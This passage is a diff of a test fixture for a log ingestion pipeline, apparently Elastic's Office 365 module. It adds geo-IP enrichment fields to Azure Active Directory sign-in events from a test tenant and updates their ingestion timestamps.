"{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.13\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.13\",\"CreationTime\":\"2020-02-12T21:38:37\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"1ca4f684-3a34-44a8-99b8-064d1071768a\",\"InterSystemsId\":\"61f81224-65fd-4c1b-b388-ee0e25485191\",\"IntraSystemId\":\"dc0cc415-9a00-470d-bda3-867e11fdd400\",\"ModifiedProperties\":[],\"ObjectId\":\"00000003-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", @@ -3242,6 +3566,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.13" }, "tags": [ @@ -3322,7 +3658,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:42:12.970212800Z", + "ingested": "2021-12-14T14:49:08.047430883Z", "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.13\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.13\",\"CreationTime\":\"2020-02-12T10:51:50\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"3f6c8eb2-c64b-4dc5-b8fd-be252f8e09c2\",\"InterSystemsId\":\"661f2330-3e04-483d-9781-caaa4543cc13\",\"IntraSystemId\":\"01c15486-46e2-487a-91f5-11445da0b600\",\"ModifiedProperties\":[],\"ObjectId\":\"00000003-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", @@ -3362,6 +3698,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ @@ -3442,7 +3790,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:42:12.970218500Z", + "ingested": "2021-12-14T14:49:08.047431512Z", "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:13:42\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"b290b902-b6f2-49f6-b7f8-ea1541d85c8c\",\"InterSystemsId\":\"68d7eaa4-aa57-4508-9792-09e80c911aa1\",\"IntraSystemId\":\"1590b91f-bffe-4cd8-9028-de52692f5400\",\"ModifiedProperties\":[],\"ObjectId\":\"0f698dd4-f011-4d23-a33e-b36416dcb1e6\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"0f698dd4-f011-4d23-a33e-b36416dcb1e6\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", @@ -3482,6 +3830,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ @@ -3561,7 +3921,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:42:12.970224100Z", + "ingested": "2021-12-14T14:49:08.047432094Z", "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"4345a7b9-9a63-4910-a426-35363201d503\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-07T16:42:59\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"RequestType\",\"Value\":\"Login:login\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"}],\"Id\":\"b0c1c4a7-c6db-4f14-b628-54e37a7a6785\",\"InterSystemsId\":\"6ae96167-2df2-425c-9f91-27e6345eb782\",\"IntraSystemId\":\"f54da4fe-0a54-45f3-b6ea-39f873eb6000\",\"LogonError\":\"FlowTokenExpired\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", @@ -3601,6 +3961,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ @@ -3682,7 +4054,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:42:12.970229600Z", + "ingested": "2021-12-14T14:49:08.047432666Z", "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"4345a7b9-9a63-4910-a426-35363201d503\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-07T16:43:02\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"FlowTokenScenario\",\"Value\":\"Login\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"1\"},{\"Name\":\"RequestType\",\"Value\":\"Login:login\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"}],\"Id\":\"82d834e4-f6f2-476a-902e-e1e9fd6f87d8\",\"InterSystemsId\":\"6ae96167-2df2-425c-9f91-27e6345eb782\",\"IntraSystemId\":\"7fa5e138-ac87-4063-a278-56c6c6965e00\",\"LogonError\":\"UserStrongAuthClientAuthNRequiredInterrupt\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0000-c000-000000000000\",\"Operation\":\"UserLoginFailed\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Failed\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", @@ -3722,6 +4094,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.13" }, "tags": [ @@ -3790,7 +4174,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:42:12.970235300Z", + "ingested": "2021-12-14T14:49:08.047433358Z", "original": "{\"Actor\":[{\"ID\":\"Unknown\",\"Type\":0}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.13\",\"ApplicationId\":\"\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.13\",\"CreationTime\":\"2020-02-12T21:38:19\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Logout\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"}],\"Id\":\"e5e2c41a-55ea-4681-9d64-78ddd7145bd2\",\"InterSystemsId\":\"6b9a8662-857f-45e4-bbb2-d106d5aab41e\",\"IntraSystemId\":\"0fee3b91-5e56-45f6-9b3c-792602b1e500\",\"LogonError\":\"None\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"Unknown\",\"UserKey\":\"Not Available\",\"UserType\":5,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", @@ -3827,6 +4211,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ @@ -3907,7 +4303,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:42:12.970241200Z", + "ingested": "2021-12-14T14:49:08.047433945Z", "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-07T16:43:40\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"2a23206a-2f5d-4cb7-aeb8-f285d10e6f80\",\"InterSystemsId\":\"6bab76a8-98bd-42e4-b722-a31fe81b030a\",\"IntraSystemId\":\"c3ebcde8-62f6-4cc4-8e0c-c11c08e76100\",\"ModifiedProperties\":[],\"ObjectId\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", @@ -3947,6 +4343,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ @@ -4015,7 +4423,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:42:12.970247Z", + "ingested": "2021-12-14T14:49:08.047434498Z", "original": "{\"Actor\":[{\"ID\":\"Unknown\",\"Type\":0}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T15:30:58\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Logout\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"}],\"Id\":\"c0a0d198-825b-4e39-b868-0a7b0552b209\",\"InterSystemsId\":\"6fee997e-1b2a-4a95-a8be-ea85642ed652\",\"IntraSystemId\":\"8b270c82-1240-4a0a-ac15-1e1116261400\",\"LogonError\":\"None\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"Unknown\",\"UserKey\":\"Not Available\",\"UserType\":5,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", @@ -4052,6 +4460,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ @@ -4133,7 +4553,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:42:12.970252800Z", + "ingested": "2021-12-14T14:49:08.047435288Z", "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"c44b4083-3bb0-49c1-b47d-974e53cbdf3c\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T15:31:33\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"FlowTokenScenario\",\"Value\":\"Login\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"1\"},{\"Name\":\"RequestType\",\"Value\":\"Login:login\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"}],\"Id\":\"52b07191-3887-40fb-a001-f4122b0851d1\",\"InterSystemsId\":\"6fee997e-1b2a-4a95-a8be-ea85642ed652\",\"IntraSystemId\":\"b0faaf7a-913e-4a93-8ccc-ecfaa2b42400\",\"LogonError\":\"UserStrongAuthClientAuthNRequiredInterrupt\",\"ModifiedProperties\":[],\"ObjectId\":\"797f4846-ba00-4fd7-ba43-dac1f8f63013\",\"Operation\":\"UserLoginFailed\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Failed\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"797f4846-ba00-4fd7-ba43-dac1f8f63013\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", @@ -4173,6 +4593,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ @@ -4241,7 +4673,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:42:12.970258400Z", + "ingested": "2021-12-14T14:49:08.047435794Z", "original": "{\"Actor\":[{\"ID\":\"Unknown\",\"Type\":0}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:14:25\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Logout\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"}],\"Id\":\"c62fa78d-daab-494e-a638-8321ebd71b9e\",\"InterSystemsId\":\"6fee997e-1b2a-4a95-a8be-ea85642ed652\",\"IntraSystemId\":\"d949d6c2-472e-4901-bd70-96cbfe534c00\",\"LogonError\":\"None\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"Unknown\",\"UserKey\":\"Not Available\",\"UserType\":5,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", @@ -4278,6 +4710,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ @@ -4359,7 +4803,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:42:12.970264Z", + "ingested": "2021-12-14T14:49:08.047436312Z", "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"c44b4083-3bb0-49c1-b47d-974e53cbdf3c\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:14:51\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"FlowTokenScenario\",\"Value\":\"Login\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"1\"},{\"Name\":\"RequestType\",\"Value\":\"Login:login\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"}],\"Id\":\"73c76212-8120-4e21-a383-c80d8327b606\",\"InterSystemsId\":\"6fee997e-1b2a-4a95-a8be-ea85642ed652\",\"IntraSystemId\":\"42c7ec91-1e2f-4505-b728-3a165b244f00\",\"LogonError\":\"UserStrongAuthClientAuthNRequiredInterrupt\",\"ModifiedProperties\":[],\"ObjectId\":\"797f4846-ba00-4fd7-ba43-dac1f8f63013\",\"Operation\":\"UserLoginFailed\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Failed\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"797f4846-ba00-4fd7-ba43-dac1f8f63013\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", @@ -4399,6 +4843,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ @@ -4479,7 +4935,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:42:12.970269500Z", + "ingested": "2021-12-14T14:49:08.047437030Z", "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"c44b4083-3bb0-49c1-b47d-974e53cbdf3c\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:29:56\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"29f94716-3717-4671-962e-9c739b764f07\",\"InterSystemsId\":\"6fee997e-1b2a-4a95-a8be-ea85642ed652\",\"IntraSystemId\":\"8b8e8663-8a8c-4959-a692-e3eece085300\",\"ModifiedProperties\":[],\"ObjectId\":\"797f4846-ba00-4fd7-ba43-dac1f8f63013\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"797f4846-ba00-4fd7-ba43-dac1f8f63013\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", @@ -4519,6 +4975,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ @@ -4599,7 +5067,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:42:12.970275200Z", + "ingested": "2021-12-14T14:49:08.047437694Z", "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"c44b4083-3bb0-49c1-b47d-974e53cbdf3c\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:51:23\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 